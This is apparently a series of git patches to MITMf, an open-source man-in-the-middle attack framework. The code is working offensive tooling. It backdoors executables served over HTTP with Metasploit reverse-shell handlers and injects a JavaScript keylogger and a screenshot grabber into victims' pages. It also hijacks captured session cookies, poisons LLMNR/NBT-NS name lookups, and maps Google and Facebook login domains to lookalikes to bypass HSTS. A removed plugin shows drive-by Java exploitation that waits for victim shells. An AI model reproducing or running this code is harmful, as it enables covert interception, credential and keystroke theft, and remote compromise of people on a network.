class FilePwn(Plugin): name = "FilePwn" optname = "filepwn" desc = "Backdoor executables being sent over http using bdfactory" - implements = ["handleResponse"] - tree_output = ["BDFProxy v0.3.2 online"] + tree_info = ["BDFProxy v0.3.2 online"] version = "0.3" has_opts = False @@ -134,17 +134,23 @@ class FilePwn(Plugin): msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary msf.login('msf', rpcpass) version = msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v{}".format(version)) + self.tree_info.append("Connected to Metasploit v{}".format(version)) + + t = threading.Thread(name='setupMSF', target=self.setupMSF, args=(msf,)) + t.setDaemon(True) + t.start() except Exception: sys.exit("[-] Error connecting to MSF! 
Make sure you started Metasploit and its MSGRPC server") + + def setupMSF(self, msf): - self.tree_output.append("Setting up Metasploit payload handlers") jobs = msf.call('job.list') for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: cmd = "use exploit/multi/handler\n" cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) cmd += "set LHOST {}\n".format(config["HOST"]) cmd += "set LPORT {}\n".format(config["PORT"]) + cmd += "set ExitOnSession False\n" cmd += "exploit -j\n" if jobs: @@ -589,46 +595,46 @@ class FilePwn(Plugin): self.patched.put(tempZipFile) return - def handleResponse(self, request, data): + def serverResponse(self, response, request, data): - content_header = request.client.headers['Content-Type'] - client_ip = request.client.getClientIP() + content_header = response.headers['Content-Type'] + client_ip = response.getClientIP() if content_header in self.zipMimeTypes: if self.bytes_have_format(data, 'zip'): - mitmf_logger.info("{} Detected supported zip file type!".format(client_ip)) + mitmf_logger.info("[FilePwn] {} Detected supported zip file type!".format(client_ip)) process = multiprocessing.Process(name='zip', target=self.zip, args=(data,)) process.daemon = True process.start() - process.join() + #process.join() bd_zip = self.patched.get() if bd_zip: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_zip} + mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip)) + return {'response': response, 'request': request, 'data': bd_zip} else: for tartype in ['gz','bz','tar']: if self.bytes_have_format(data, tartype): - mitmf_logger.info("{} Detected supported tar file type!".format(client_ip)) + mitmf_logger.info("[FilePwn] {} Detected supported tar file type!".format(client_ip)) process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) process.daemon = True process.start() - process.join() + #process.join() bd_tar = self.patched.get() if bd_tar: - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_tar} + mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip)) + return {'response': response, 'request': request, 'data': bd_tar} elif content_header in self.binaryMimeTypes: for bintype in ['pe','elf','fatfile','machox64','machox86']: if self.bytes_have_format(data, bintype): - mitmf_logger.info("{} Detected supported binary type!".format(client_ip)) + mitmf_logger.info("[FilePwn] {} Detected supported binary type ({})!".format(client_ip, bintype)) fd, tmpFile = mkstemp() with open(tmpFile, 'w') as f: f.write(data) @@ -636,15 +642,14 @@ class FilePwn(Plugin): process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) process.daemon = True process.start() - process.join() + #process.join() patchb = self.patched.get() if patchb: bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() os.remove('./backdoored/' + os.path.basename(tmpFile)) - mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip)) - return {'request': request, 'data': bd_binary} + mitmf_logger.info("[FilePwn] {} Patching complete, forwarding to client".format(client_ip)) + return {'response': response, 'request': request, 'data': bd_binary} - else: - mitmf_logger.debug("{} File is not of supported 
Content-Type: {}".format(client_ip, content_header)) - return {'request': request, 'data': data} \ No newline at end of file + mitmf_logger.debug("[FilePwn] {} File is not of supported Content-Type: {}".format(client_ip, content_header)) + return {'response': response, 'request': request, 'data': data} \ No newline at end of file diff --git a/plugins/Inject.py b/plugins/Inject.py index f448b2b..d86b5ef 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -27,46 +27,45 @@ import argparse from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.CacheKill import CacheKill -from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger("mitmf") -class Inject(Plugin): +class Inject(CacheKill, Plugin): name = "Inject" optname = "inject" desc = "Inject arbitrary content into HTML content" - version = "0.2" + version = "0.3" has_opts = True def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.our_ip = SystemConfig.getIP(options.interface) - self.html_src = options.html_url - self.js_src = options.js_url - self.rate_limit = options.rate_limit - self.count_limit = options.count_limit - self.per_domain = options.per_domain - self.black_ips = options.black_ips - self.white_ips = options.white_ips - self.match_str = "" or options.match_str - self.html_payload = options.html_payload - self.ctable = {} - self.dtable = {} - self.count = 0 - self.mime = "text/html" + self.options = options + self.our_ip = SystemConfig.getIP(options.interface) + self.html_src = options.html_url + self.js_src = options.js_url + self.rate_limit = options.rate_limit + self.count_limit = options.count_limit + self.per_domain = options.per_domain + self.black_ips = options.black_ips.split(',') + self.white_ips = options.white_ips.split(',') + self.white_domains = options.white_domains.split(',') + self.black_domains = options.black_domains.split(',') + self.match_str = "" or options.match_str + self.html_payload = options.html_payload + self.ctable = {} + self.dtable = {} + self.count = 0 + self.mime = "text/html" if not options.preserve_cache: - cachekill = CacheKill() - cachekill.initialize(options) - ProxyPlugins.getInstance().addPlugin(cachekill) + CacheKill.initialize(self, options) def serverResponse(self, response, request, data): #We throttle to only inject once every two seconds per client #If you have MSF on another host, you may need to check prior to injection #print "http://" + response.client.getRequestHostname() + response.uri ip, hn, mime = self._get_req_info(response) - if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.our_ip): + if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and self._host_filter(hn) and (hn not in self.our_ip): if (not self.js_src == self.html_src is not None or not self.html_payload == ""): data = self._insert_html(data, post=[(self.match_str, self._get_payload())]) self.ctable[ip] = time.time() @@ -81,20 +80,37 @@ class Inject(Plugin): def _ip_filter(self, ip): - if self.white_ips is not None: - if ip in self.white_ips.split(','): + if self.white_ips[0] != '': + if ip in self.white_ips: return True else: return False - if self.black_ips is not None: - if ip in self.black_ips.split(','): + if self.black_ips[0] != '': + if ip in self.black_ips: return False else: return True return True + def _host_filter(self, host): + + if self.white_domains[0] != '': + if host in self.white_domains: + return True + else: + return False 
+ + if self.black_domains[0] != '': + if host in self.black_domains: + return False + else: + return True + + return True + + def _should_inject(self, ip, hn, mime): if self.count_limit == self.rate_limit is None and not self.per_domain: @@ -153,12 +169,14 @@ class Inject(Plugin): def pluginOptions(self, options): options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.") options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.") - options.add_argument("--html-payload", type=str, default=None, help="String you would like to inject.") + options.add_argument("--html-payload", type=str, default='', help="String you would like to inject.") options.add_argument("--match-str", type=str, default=None, help="String you would like to match and place your payload before. ( by default)") options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.") group = options.add_mutually_exclusive_group(required=False) group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.") group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.") group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.") - group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips") - group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips") + group.add_argument("--white-ips", metavar='IPS', type=str, default='', help="Inject content ONLY for these ips (comma seperated)") + group.add_argument("--black-ips", metavar='IPS', type=str, default='', help="DO NOT inject content for these ips (comma seperated)") + group.add_argument("--white-domains", metavar='DOMAINS', type=str, default='', help="Inject content ONLY for these domains (comma seperated)") + group.add_argument("--black-domains", metavar='DOMAINS', type=str, default='', help="DO NOT inject content for these domains (comma seperated)") diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py deleted file mode 100644 index e563208..0000000 --- a/plugins/JavaPwn.py +++ /dev/null @@ -1,231 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. 
-# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import string -import random -import threading -import sys -import logging - -from time import sleep -from core.msfrpc import Msfrpc -from core.utils import SystemConfig -from plugins.plugin import Plugin -from plugins.BrowserProfiler import BrowserProfiler - -mitmf_logger = logging.getLogger("mitmf") - -class JavaPwn(Plugin): - name = "JavaPwn" - optname = "javapwn" - desc = "Performs drive-by attacks on clients with out-of-date java browser plugins" - tree_output = [] - version = "0.3" - has_opts = False - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.msfip = SystemConfig.getIP(options.interface) - - try: - msfcfg = options.configfile['MITMf']['Metasploit'] - except Exception, e: - sys.exit("[-] Error parsing Metasploit options in config file : {}".format(e)) - - try: - self.javacfg = options.configfile['JavaPwn'] - except Exception, e: - sys.exit("[-] Error parsing config for JavaPwn: {}".format(e)) - - self.msfport = msfcfg['msfport'] - self.rpcip = msfcfg['rpcip'] - self.rpcpass = msfcfg['rpcpass'] - - #Initialize the BrowserProfiler plugin - BrowserProfiler.initialize(self, options) - self.black_ips = [] - - try: - self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary - self.msf.login('msf', self.rpcpass) - version = self.msf.call('core.version')['version'] - self.tree_output.append("Connected to Metasploit v{}".format(version)) - except Exception: - sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") - - def onConfigChange(self): - self.initialize(self.options) - - def startThread(self, options): - self.pwn() - - def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) - return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) - - def get_exploit(self, java_version): - exploits = [] - - client_vstring = java_version[:-len(java_version.split('.')[3])-1] - client_uversion = int(java_version.split('.')[3]) - - for ver in self.javacfg['Multi'].iteritems(): - if type(ver[1]) is list: - for list_vers in ver[1]: - - version_string = list_vers[:-len(list_vers.split('.')[3])-1] - update_version = int(list_vers.split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif (client_vstring == version_string): - if client_uversion <= update_version: - exploits.append(ver[0]) - else: - version_string = ver[1][:-len(ver[1].split('.')[3])-1] - update_version = int(ver[1].split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif client_vstring == version_string: - if client_uversion <= update_version: - exploits.append(ver[0]) - - return exploits - - - def injectWait(self, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions - #inject iframe - mitmf_logger.info("{} >> now injecting iframe to trigger exploit".format(client_ip)) - self.html_payload = "".format(self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects - - mitmf_logger.info('{} 
>> waiting for ze shellz, Please wait...'.format(client_ip)) - - exit = False - i = 1 - while i <= 30: #wait max 60 seconds for a new shell - if exit: - break - shell = self.msf.call('session.list') #poll metasploit every 2 seconds for new sessions - if len(shell) > 0: - for k, v in shell.iteritems(): - if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted - mitmf_logger.info("{} >> Got shell!".format(client_ip)) - self.sploited_ips.append(client_ip) #target successfuly owned :) - self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped - exit = True - break - sleep(2) - i += 1 - - if exit is False: #We didn't get a shell :( - mitmf_logger.info("{} >> session not established after 30 seconds".format(client_ip)) - - self.html_payload = self.get_payload() # restart the BrowserProfiler plugin - - def send_command(self, cmd, vic_ip): - try: - mitmf_logger.info("{} >> sending commands to metasploit".format(vic_ip)) - - #Create a virtual console - console_id = self.msf.call('console.create')['id'] - - #write the cmd to the newly created console - self.msf.call('console.write', [console_id, cmd]) - - mitmf_logger.info("{} >> commands sent succesfully".format(vic_ip)) - except Exception, e: - mitmf_logger.info('{} >> Error accured while interacting with metasploit: {}:{}'.format(vic_ip, Exception, e)) - - def pwn(self): - self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit - while True: - if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled - - brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format - - if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited - - vic_ip = brwprofile['ip'] - - mitmf_logger.info("{} >> client has java version {} installed! 
Proceeding...".format(vic_ip, brwprofile['java_version'])) - mitmf_logger.info("{} >> Choosing exploit based on version string".format(vic_ip)) - - exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg - - if exploits: - - if len(exploits) > 1: - mitmf_logger.info("{} >> client is vulnerable to {} exploits!".format(vic_ip, len(exploits))) - exploit = random.choice(exploits) - mitmf_logger.info("{} >> choosing {}".format(vic_ip, exploit)) - else: - mitmf_logger.info("{} >> client is vulnerable to {}!".format(vic_ip, exploits[0])) - exploit = exploits[0] - - #here we check to see if we already set up the exploit to avoid creating new jobs for no reason - jobs = self.msf.call('job.list') #get running jobs - if len(jobs) > 0: - for k, v in jobs.iteritems(): - info = self.msf.call('job.info', [k]) - if exploit in info['name']: - mitmf_logger.info('{} >> {} already started'.format(vic_ip, exploit)) - url = info['uripath'] #get the url assigned to the exploit - self.injectWait(self.msf, url, vic_ip) - - else: #here we setup the exploit - rand_port = random.randint(1000, 65535) #generate a random port for the payload listener - rand_url = self.rand_url() - #generate the command string to send to the virtual console - #new line character very important as it simulates a user pressing enter - cmd = "use exploit/{}\n".format(exploit) - cmd += "set SRVPORT {}\n".format(self.msfport) - cmd += "set URIPATH {}\n".format(rand_url) - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform - cmd += "set LHOST {}\n".format(self.msfip) - cmd += "set LPORT {}\n".format(rand_port) - cmd += "exploit -j\n" - - mitmf_logger.debug("command string:\n{}".format(cmd)) - - self.send_command(cmd, vic_ip) - - self.injectWait(rand_url, vic_ip) - else: - #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert) - mitmf_logger.info("{} >> client is not vulnerable to any java exploit".format(vic_ip)) - mitmf_logger.info("{} >> falling back to the signed applet attack".format(vic_ip)) - - rand_url = self.rand_url() - rand_port = random.randint(1000, 65535) - - cmd = "use exploit/multi/browser/java_signed_applet\n" - cmd += "set SRVPORT {}\n".format(self.msfport) - cmd += "set URIPATH {}\n".format(rand_url) - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" - cmd += "set LHOST {}\n".format(self.msfip) - cmd += "set LPORT {}\n".format(rand_port) - cmd += "exploit -j\n" - - self.send_command(cmd, vic_ip) - self.injectWait(rand_url, vic_ip) - sleep(1) diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py index 2dceae8..892cc69 100644 --- a/plugins/JsKeylogger.py +++ b/plugins/JsKeylogger.py @@ -18,151 +18,54 @@ # USA # import logging +import re +import random +import string from plugins.plugin import Plugin from plugins.Inject import Inject -from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger("mitmf") -class jskeylogger(Plugin): - name = "Javascript Keylogger" +class jskeylogger(Inject, Plugin): + name = "JSKeylogger" optname = "jskeylogger" desc = "Injects a javascript keylogger into clients webpages" version = "0.2" has_opts = False def initialize(self, options): - inject = Inject() - inject.initialize(options) - inject.html_payload = self.msf_keylogger() - ProxyPlugins.getInstance().addPlugin(inject) + Inject.initialize(self, options) + self.html_payload = self.msf_keylogger() 
def clientRequest(self, request): - #Handle the plugin output if 'keylog' in request.uri: request.printPostData = False - client_ip = request.client.getClientIP() - raw_keys = request.postData.split("&&")[0] + input_field = request.postData.split("&&")[1] + keys = raw_keys.split(",") - del keys[0]; del(keys[len(keys)-1]) + if keys: + del keys[0]; del(keys[len(keys)-1]) - input_field = request.postData.split("&&")[1] + nice = '' + for n in keys: + if n == '9': + nice += "" + elif n == '8': + nice = nice[:-1] + elif n == '13': + nice = '' + else: + try: + nice += n.decode('hex') + except: + mitmf_logger.error("{} [JSKeylogger] Error decoding char: {}".format(request.client.getClientIP(), n)) - nice = '' - for n in keys: - if n == '9': - nice += "" - elif n == '8': - nice = nice.replace(nice[-1:], "") - elif n == '13': - nice = '' - else: - try: - nice += n.decode('hex') - except: - mitmf_logger.error("{} [{}] Error decoding char: {}".format(client_ip, self.name, n)) - - mitmf_logger.info("{} [{}] Host: {} Field: {} Keys: {}".format(client_ip, self.name, request.headers['host'], input_field, nice)) + mitmf_logger.info("{} [JSKeylogger] Host: {} | Field: {} | Keys: {}".format(request.client.getClientIP(), request.headers['host'], input_field, nice)) def msf_keylogger(self): - #Stolen from the Metasploit module http_javascript_keylogger, modified to work in Android and IOS + keylogger = open("./core/javascript/msfkeylogger.js", "r").read() - payload = """""" - - return payload \ No newline at end of file + return '' diff --git a/plugins/Responder.py b/plugins/Responder.py index 9f72c01..e49bcfe 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -34,7 +34,7 @@ class Responder(Plugin): name = "Responder" optname = "responder" desc = "Poison LLMNR, NBT-NS and MDNS requests" - tree_output = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"] + tree_info = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"] version = "0.2" has_opts = True @@ -88,7 +88,32 @@ class Responder(Plugin): LDAPServer().start(smbChal) if options.analyze: - self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") + self.tree_info.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") + self.IsICMPRedirectPlausible(self.ourip) + + def IsICMPRedirectPlausible(self, IP): + result = [] + dnsip = [] + for line in file('/etc/resolv.conf', 'r'): + ip = line.split() + if len(ip) < 2: + continue + if ip[0] == 'nameserver': + dnsip.extend(ip[1:]) + + for x in dnsip: + if x !="127.0.0.1" and self.IsOnTheSameSubnet(x,IP) == False: + self.tree_info.append("You can ICMP Redirect on this network. 
This workstation ({}) is not on the same subnet than the DNS server ({})".format(IP, x)) + else: + pass + + def IsOnTheSameSubnet(self, ip, net): + net = net+'/24' + ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16) + netstr, bits = net.split('/') + netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16) + mask = (0xffffffff << (32 - int(bits))) & 0xffffffff + return (ipaddr & mask) == (netaddr & mask) def pluginReactor(self, strippingFactory): reactor.listenTCP(3141, strippingFactory) @@ -100,5 +125,6 @@ class Responder(Plugin): options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "Fingerprint hosts that issued an NBT-NS or LLMNR query") options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Start the WPAD rogue proxy server") + # Removed these options until I find a better way of implementing them #options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") #options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py index ad17a3e..e6657fc 100644 --- a/plugins/SMBAuth.py +++ b/plugins/SMBAuth.py @@ -21,9 +21,8 @@ from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.Inject import Inject -from core.sergioproxy.ProxyPlugins import ProxyPlugins -class SMBAuth(Plugin): +class SMBAuth(Inject, Plugin): name = "SMBAuth" optname = "smbauth" desc = "Evoke SMB challenge-response auth attempts" @@ -33,10 +32,8 @@ class SMBAuth(Plugin): def initialize(self, options): self.target_ip = SystemConfig.getIP(options.interface) - inject = Inject() - inject.initialize(options) - inject.html_payload = self._get_data() - ProxyPlugins.getInstance().addPlugin(inject) + Inject.initialize(options) + self.html_payload = self._get_data() def _get_data(self): return ''\ diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py index 887a6f0..d3753ac 100644 --- a/plugins/SSLstrip+.py +++ b/plugins/SSLstrip+.py @@ -27,12 +27,12 @@ from core.sslstrip.URLMonitor import URLMonitor from core.dnschef.DNSchef import DNSChef class HSTSbypass(Plugin): - name = 'SSLstrip+' - optname = 'hsts' - desc = 'Enables SSLstrip+ for partial HSTS bypass' - version = "0.4" - tree_output = ["SSLstrip+ by Leonardo Nve running"] - has_opts = False + name = 'SSLstrip+' + optname = 'hsts' + desc = 'Enables SSLstrip+ for partial HSTS bypass' + version = "0.4" + tree_info = ["SSLstrip+ by Leonardo Nve running"] + has_opts = False def initialize(self, options): self.options = options diff --git a/plugins/Screenshotter.py b/plugins/Screenshotter.py new file mode 100644 index 0000000..23cb23e --- /dev/null +++ b/plugins/Screenshotter.py @@ -0,0 +1,53 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any 
later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +import base64 + +from datetime import datetime +from plugins.Inject import Inject +from plugins.plugin import Plugin + +mitmf_logger = logging.getLogger('mitmf') + +class ScreenShotter(Inject, Plugin): + name = 'ScreenShotter' + optname = 'screen' + desc = 'Uses HTML5 Canvas to render an accurate screenshot of a clients browser' + ver = '0.1' + has_opts = False + + def initialize(self, options): + Inject.initialize(self, options) + self.html_payload = self.get_payload() + + def clientRequest(self, request): + if 'saveshot' in request.uri: + request.printPostData = False + img_file = './logs/{}-{}-{}.png'.format(request.client.getClientIP(), request.headers['host'], datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")) + with open(img_file, 'wb') as img: + img.write(base64.b64decode(request.postData[30:] + '==')) + img.close() + + mitmf_logger.info('{} [ScreenShotter] Saved screenshot to {}'.format(request.client.getClientIP(), img_file)) + + def get_payload(self): + canvas = open("./core/javascript/screenshot.js", "rb").read() + return '' \ No newline at end of file diff --git a/plugins/Spoof.py b/plugins/Spoof.py index a2adfae..086128c 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -32,7 +32,6 @@ class Spoof(Plugin): name = "Spoof" optname = "spoof" desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS" - tree_output = list() version = "0.6" has_opts = True @@ -63,7 +62,7 @@ class Spoof(Plugin): arpwatch = ARPWatch(options.gateway, self.myip, options.interface) arpwatch.debug = debug - self.tree_output.append("ARPWatch online") + self.tree_info.append("ARPWatch online") self.protocolInstances.append(arpwatch) arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets) diff --git a/plugins/plugin.py b/plugins/plugin.py index f6a7cde..0d5a324 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -8,10 +8,11 @@ import logging mitmf_logger = logging.getLogger('mitmf') class Plugin(ConfigWatcher, object): - name = "Generic plugin" - optname = "generic" - desc = "" - has_opts = False + name = "Generic plugin" + optname = "generic" + tree_info = list() + desc = "" + has_opts = False def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' diff --git a/requirements.txt b/requirements.txt index 75fc1ad..1df0c6a 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,10 +4,7 @@ scapy msgpack-python dnspython dnslib -user-agents configobj -pyyaml -ua-parser Pillow pefile ipy @@ -16,4 +13,4 @@ service_identity watchdog impacket capstone -pypcap +pypcap \ No newline at end of file From b9371f7cdcb179aa7d38d6395688906a186d6360 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Sat, 16 May 2015 21:22:11 +0200 Subject: [PATCH 18/20] Screenshotter plugin now live! Added an interval option to specify the interval at which to take the sceenshots Ferret-NG plugin is pretty much set also, was a bit of a dummy and didn't take into account that we would have sessions from multiple clients (duh!) 
, so I added a section in the config file to specify the client to hijack the sessions from , also added an option to load the cookies from a log file! --- config/mitmf.conf | 35 +++++++++++++--------- core/dnschef/DNSchef.py | 3 +- core/ferretng/ClientRequest.py | 11 +++++-- core/ferretng/URLMonitor.py | 1 + core/javascript/screenshot.js | 2 +- core/protocols/arp/ARPWatch.py | 5 ++-- core/protocols/arp/ARPpoisoner.py | 3 +- core/protocols/smb/SMBserver.py | 3 +- core/utils.py | 12 ++++++-- mitmf.py | 18 ++++------- plugins/BeefAutorun.py | 4 +-- plugins/BrowserSniper.py | 5 ++-- plugins/FerretNG.py | 50 ++++++++++++++++++++++++++----- plugins/FilePwn.py | 3 +- plugins/Responder.py | 6 ++-- plugins/Screenshotter.py | 26 +++++++++++----- plugins/Spoof.py | 13 ++++---- 17 files changed, 130 insertions(+), 70 deletions(-) diff --git a/config/mitmf.conf b/config/mitmf.conf index ce7e7ec..c6a4269 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -103,6 +103,27 @@ [[Regex2]] "I'm Feeling Lucky" = "I'm Feeling Something In My Pants" +[Ferret-NG] + # + # Here you can specify the client to hijack sessions from + # + + Client = '192.168.20.126' + +[SSLstrip+] + + # + #Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com + # + + #for google and gmail + accounts.google.com = account.google.com + mail.google.com = gmail.google.com + accounts.google.se = cuentas.google.se + + #for facebook + www.facebook.com = social.facebook.com + [Responder] #Set these values to On or Off, so you can control which rogue authentication server is turned on. @@ -317,20 +338,6 @@ Plugin = Flash PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144 -[SSLstrip+] - - # - #Here you can configure your domains to bypass HSTS on, the format is real.domain.com = fake.domain.com - # - - #for google and gmail - accounts.google.com = account.google.com - mail.google.com = gmail.google.com - accounts.google.se = cuentas.google.se - - #for facebook - www.facebook.com = social.facebook.com - [FilePwn] # BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' diff --git a/core/dnschef/DNSchef.py b/core/dnschef/DNSchef.py index e1473a2..a65d8cd 100755 --- a/core/dnschef/DNSchef.py +++ b/core/dnschef/DNSchef.py @@ -41,6 +41,7 @@ import logging from configobj import ConfigObj from core.configwatcher import ConfigWatcher +from core.utils import shutdown from dnslib import * from IPy import IP @@ -481,7 +482,7 @@ class DNSChef(ConfigWatcher): self.startUDP() except socket.error as e: if "Address already in use" in e: - sys.exit("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) + shutdown("\n[-] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port'])) # Initialize and start the DNS Server def startUDP(self): diff --git a/core/ferretng/ClientRequest.py b/core/ferretng/ClientRequest.py index 
ac6a80b..c9eeb36 100644 --- a/core/ferretng/ClientRequest.py +++ b/core/ferretng/ClientRequest.py @@ -71,9 +71,14 @@ class ClientRequest(Request): del headers['cache-control'] if 'host' in headers: - if headers['host'] in self.urlMonitor.cookies: - mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host'])) - headers['cookie'] = self.urlMonitor.cookies[headers['host']] + try: + for entry in self.urlMonitor.cookies[self.urlMonitor.hijack_client]: + if headers['host'] == entry['host']: + mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host'])) + headers['cookie'] = entry['cookie'] + except KeyError: + mitmf_logger.error("[Ferret-NG] No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client)) + pass return headers diff --git a/core/ferretng/URLMonitor.py b/core/ferretng/URLMonitor.py index d1381aa..85386f9 100644 --- a/core/ferretng/URLMonitor.py +++ b/core/ferretng/URLMonitor.py @@ -32,6 +32,7 @@ class URLMonitor: # Start the arms race, and end up here... javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] cookies = dict() + hijack_client = '' _instance = None def __init__(self): diff --git a/core/javascript/screenshot.js b/core/javascript/screenshot.js index fea115f..fe50ad7 100644 --- a/core/javascript/screenshot.js +++ 